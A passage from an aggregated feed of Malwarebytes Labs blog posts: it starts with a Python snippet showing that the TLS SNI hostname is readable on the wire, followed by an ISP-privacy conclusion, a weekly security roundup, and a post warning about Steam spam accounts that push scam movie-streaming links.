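    p = 4 + 2 + 32                                   # handshake header, client_version, random
    p += 1 + hs[p]                                   # session_id
    p += 2 + struct.unpack_from("!H", hs, p)[0]      # cipher_suites
    p += 1 + hs[p]                                   # compression_methods
    if p + 2 > len(hs):
        return None                                  # no extensions block at all
    end = p + 2 + struct.unpack_from("!H", hs, p)[0]
    p += 2
    if end > len(hs):
        raise ValueError("extensions overrun the handshake")
    while p + 4 <= end:
        ext_type, ext_len = struct.unpack_from("!HH", hs, p)
        data = hs[p + 4:p + 4 + ext_len]
        p += 4 + ext_len
        if ext_type != SNI_EXTENSION_TYPE:
            continue
        q = 2                                        # skip server_name_list length
        while q + 3 <= len(data):
            name_type, name_len = data[q], struct.unpack_from("!H", data, q + 1)[0]
            q += 3
            if name_type == 0:
                return data[q:q + name_len].decode("idna")
            q += name_len
    return None


def extract_sni(record: bytes) -> Optional[str]:
    """Return the cleartext SNI hostname an on-path observer can read from a ClientHello,
    None if the client sent none, and raise ValueError if the record is malformed."""
    try:
        return _extract_sni(record)
    except (struct.error, IndexError) as exc:
        raise ValueError("malformed ClientHello") from exc


if __name__ == "__main__":
    hello = build_client_hello("example.com")
    print("bytes on the wire contain the hostname:", b"example.com" in hello)
    print("SNI visible to the network:", extract_sni(hello))
```

The request path and page content travel in later, encrypted records, which is why the extension hides what you read on a site but not which site you visited.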

Calling your congressman

Privacy is a developing issue. As technology advances, its ability to infringe on our privacy in irritating and sometimes dangerous ways can increase. Letting your representatives know that this is a concern can help prevent worse legislation in the future. If you’d like to make your opinion on online privacy known, you can find your representatives here and here.

In conclusion, strong online privacy can sometimes be an inconvenience for those of us trying to catch cybercriminals. But its loss hurts all of us. Whether you have ‘something to hide’ or not, your data and your identity belong to you. Why shouldn’t you control how it’s used?

The post Your ISP, browsing history, and what to do about it appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (Mar 27 – Apr 02)

Malwarebytes - Mon, 04/03/2017 - 15:00

Do we have blogs for you! Last week, we cracked open a big book of definitions on what packers, crypters, and protectors are, dug into preinstalled mobile Adware, and warned of World of Warcraft phishing involving “free” pets. Elsewhere, we explained what exploits actually are and why they’re a big deal, explained the workings of Sage ransomware, took a deep dive into a website compromise campaign, the money problems of tech support scammers, and advised you to avoid a night at the movies.

Below are notable news stories and security-related happenings:

Safe surfing, everyone!

The Malwarebytes Labs Team

The post A week in security (Mar 27 – Apr 02) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Steam spammers have a night at the movies

Malwarebytes - Fri, 03/31/2017 - 15:00

Users of gaming platform Steam have the ability to upload images from games, post messages, and more besides, into their social network stream. They also have the option to upload game-related artwork. Spammers occasionally make use of this feature to sling some spam at the gaming masses.

We’ve spotted one such example in the wild, in the form of a profile claiming to be IMDB offering up free movies. Below you can see they’ve uploaded six decidedly non-game related images, all of which claim a movie is but a click away.

There’s also some spam text accompanying the various pictures in an attempt to gain some search engine juice and also to provide a link for would-be movie watchers to click on.

Some of the links are in the flavor text, a few are only viewable if you enlarge the image, and more still are posted as standalone comments underneath the original picture.

As for where they go, it’s worth noting that Steam’s link filter will warn people that they’re about to move away from Steam (generally, this is there to try and help deter phishing but also serves as fair warning for any other scam you can think of).

Should they continue on with their journey, they’ll end up in a variety of locations.

We looked at three links, which were:

movies.putlockervideos(dot)com/movie/127380/finding-dory(dot)html
free-movies-streaming(dot)com/movie/321612/beauty-and-the-beast(dot)html
watchstv(dot)xyz/?do=play&id=65854-3-3-60-Days-In-Watch-Online-Series

Of the three links, all of them initially land on a “Watch this movie” page with what appears to be a movie player embedded and various pieces of movie-related text scattered about the place.

After that, though:

1. One of our links took us to a survey page, which asks the visitor to fill in personal info on offers in return for “something”. It’s fair to say we’d be very cautious about doing this, as more often than not you never receive the desired prize(s) after handing over a bunch of PII.

2. Another link took us to a movie site which says “sign up for free”, but also wants you to pay a monthly billing fee to continue membership (we looked at the Terms & Conditions, but we couldn’t pin down an exact number).

3. Possibly the worst of the bunch, this one suggests Finding Dory is available to watch.

Clicking the box, however, takes visitors to an Ad rotator URL which drops us off at a variety of non-child friendly links. Various adult webcams, surveys, and related sites all lie in wait.

So, you know, whoops.

Accounts such as the one pushing the above links tend to get deleted or cleaned up (if it’s been hijacked) fairly quickly. Don’t make life easier for the spammers – ignore all of their attempts to give you a night at the movies and report them to Steam. With any luck, they’ll be ejected from the cinema before the trailers are over.


Christopher Boyd

The post Steam spammers have a night at the movies appeared first on Malwarebytes Labs.

Categories: Techie Feeds
